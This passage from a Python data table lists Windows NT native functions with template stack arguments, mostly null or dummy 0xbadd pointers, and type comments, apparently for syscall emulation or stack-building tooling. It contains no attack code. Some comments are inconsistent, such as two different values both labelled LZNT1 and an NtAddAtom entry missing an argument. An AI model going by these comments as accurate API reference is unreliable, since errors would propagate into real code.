],\r\n \"structures\": {}\r\n },\r\n \"NtRequestWakeupLatency\": {\r\n \"ntFunc\": \"NtRequestWakeupLatency\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x000003E8\",\r\n \"additionalComment\": \"LATENCY_TIME latency (1000 ms, typical value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtW32Call\": {\r\n \"ntFunc\": \"NtW32Call\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG OutputLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to output buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"InputLength (8 bytes, typical small input)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to input buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ApiNumber (example: 1, typical for a known API call)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"KiUserApcDispatcher\": {\r\n \"ntFunc\": \"KiUserApcDispatcher\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ContextBody pointer (no context provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ContextStart pointer (no context provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Unused3 pointer (reserved, unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Unused2 pointer (reserved, unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Unused1 pointer (reserved, unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlertThread\": {\r\n \"ntFunc\": \"NtAlertThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (None, current thread)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCallbackReturn\": {\r\n \"ntFunc\": \"NtCallbackReturn\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"NTSTATUS Status (STATUS_SUCCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG ResultLength (0, no result)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Result (None, no result buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueueApcThread\": {\r\n \"ntFunc\": \"NtQueueApcThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG ApcReserved (reserved, must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK ApcStatusBlock (None, not used)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcRoutineContext (None, no context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PIO_APC_ROUTINE ApcRoutine (None, no routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (None, current thread)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTestAlert\": {\r\n \"ntFunc\": \"NtTestAlert\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtAddAtom\": {\r\n \"ntFunc\": \"NtAddAtom\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PRTL_ATOM Atom (None, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PWCHAR AtomName (None, no atom name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDeleteAtom\": {\r\n \"ntFunc\": \"NtDeleteAtom\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00004242\",\r\n \"additionalComment\": \"RTL_ATOM Atom (example atom value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFindAtom\": {\r\n \"ntFunc\": \"NtFindAtom\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to RTL_ATOM Atom (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to WCHAR AtomName (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0020\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationAtom\": {\r\n \"ntFunc\": \"NtQueryInformationAtom\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG AtomInformationLength (example length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to AtomInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0050\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ATOM_INFORMATION_CLASS AtomInformationClass (e.g., AtomBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004242\",\r\n \"additionalComment\": \"RTL_ATOM Atom (example atom value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCompressBuffer\": {\r\n \"ntFunc\": \"RtlCompressBuffer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to WorkspaceBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0070\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to ULONG pDestinationSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Unknown (reserved, typically 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"ULONG DestinationBufferLength (example: 8 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to DestinationBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00a0\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG SourceBufferLength (example: 4 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to SourceBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00c0\"\r\n },\r\n {\r\n \"value\": \"0x00000201\",\r\n \"additionalComment\": \"ULONG CompressionFormat (COMPRESSION_FORMAT_LZNT1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlDecompressBuffer\": {\r\n \"ntFunc\": \"RtlDecompressBuffer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to ULONG pDestinationSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG SourceBufferLength (example: 4 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to SourceBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd00f0\"\r\n },\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"ULONG DestinationBufferLength (example: 8 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to DestinationBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0110\"\r\n },\r\n {\r\n \"value\": \"0x00000201\",\r\n \"additionalComment\": \"ULONG CompressionFormat (COMPRESSION_FORMAT_LZNT1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlGetCompressionWorkSpaceSize\": {\r\n \"ntFunc\": \"RtlGetCompressionWorkSpaceSize\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG pUnknown (dummy pointer, typically unused or reserved)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG pNeededBufferSize (dummy pointer, receives required workspace size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00004000\"\r\n },\r\n {\r\n \"value\": \"0x00000200\",\r\n \"additionalComment\": \"CompressionFormat (COMPRESSION_FORMAT_LZNT1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"DbgPrint\": {\r\n \"ntFunc\": \"DbgPrint\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LPCSTR Format string (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd1000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSystemDebugControl\": {\r\n \"ntFunc\": \"NtSystemDebugControl\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, receives output length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG OutputBufferLength (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OutputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd2000\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG InputBufferLength (32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to InputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd3000\"\r\n },\r\n {\r\n \"value\": \"0x0000000B\",\r\n \"additionalComment\": \"SYSDBG_COMMAND Command (e.g., SysDbgReadVirtual)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCaptureStackBackTrace\": {\r\n \"ntFunc\": \"RtlCaptureStackBackTrace\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG BackTraceHash (dummy pointer, receives hash value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x12345678\"\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to BackTrace array (dummy pointer, receives stack addresses)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd4000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG FramesToCapture (16 frames)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG FramesToSkip (skip 2 frames)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlGetCallersAddress\": {\r\n \"ntFunc\": \"RtlGetCallersAddress\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to PVOID CallersCaller (dummy pointer, receives caller's caller address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x7ffdf000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to PVOID CallersAddress (dummy pointer, receives caller's address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x7ffde000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDisplayString\": {\r\n \"ntFunc\": \"NtDisplayString\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PUNICODE_STRING String (no string displayed)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRaiseException\": {\r\n \"ntFunc\": \"NtRaiseException\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HandleException = FALSE (do not handle in-process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PCONTEXT ThreadContext (no context provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PEXCEPTION_RECORD ExceptionRecord (no exception record provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRaiseHardError\": {\r\n \"ntFunc\": \"NtRaiseHardError\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PHARDERROR_RESPONSE Response (no response pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HARDERROR_RESPONSE_OPTION = 0 (default option)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PVOID Parameters (no parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PUNICODE_STRING UnicodeStringParameterMask (no mask)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"NumberOfParameters = 0 (no parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"NTSTATUS ErrorStatus = STATUS_SUCCESS (no error)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetDefaultHardErrorPort\": {\r\n \"ntFunc\": \"NtSetDefaultHardErrorPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None HANDLE PortHandle (no port set)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySystemEnvironmentValue\": {\r\n \"ntFunc\": \"NtQuerySystemEnvironmentValue\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PULONG RequiredLength (not requesting required length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ValueBufferLength = 0 (no buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PWCHAR Value (no value buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None PUNICODE_STRING VariableName (no variable name specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSystemEnvironmentValue\": {\r\n \"ntFunc\": \"NtSetSystemEnvironmentValue\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING Value (None, typical for unset or default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING VariableName (None, typical for unset or default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCreateEnvironment\": {\r\n \"ntFunc\": \"RtlCreateEnvironment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Environment (None, receives pointer to new environment block)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN Inherit (FALSE, do not inherit parent environment)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlDestroyEnvironment\": {\r\n \"ntFunc\": \"RtlDestroyEnvironment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Environment (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlExpandEnvironmentStrings_U\": {\r\n \"ntFunc\": \"RtlExpandEnvironmentStrings_U\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG DestinationBufferLength (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING DestinationString (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING SourceString (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Environment (None, use current process environment)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlQueryEnvironmentVariable_U\": {\r\n \"ntFunc\": \"RtlQueryEnvironmentVariable_U\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING VariableValue (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING VariableName (None, typical for default or uninitialized)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Environment (None, use current process environment)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlSetCurrentEnvironment\": {\r\n \"ntFunc\": \"RtlSetCurrentEnvironment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to PVOID OldEnvironment (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to PVOID NewEnvironment (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0020\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlSetEnvironmentVariable\": {\r\n \"ntFunc\": \"RtlSetEnvironmentVariable\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING VariableValue (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct129\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the value to set.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING VariableName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct130\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the variable name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to environment block (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0060\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct129\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": 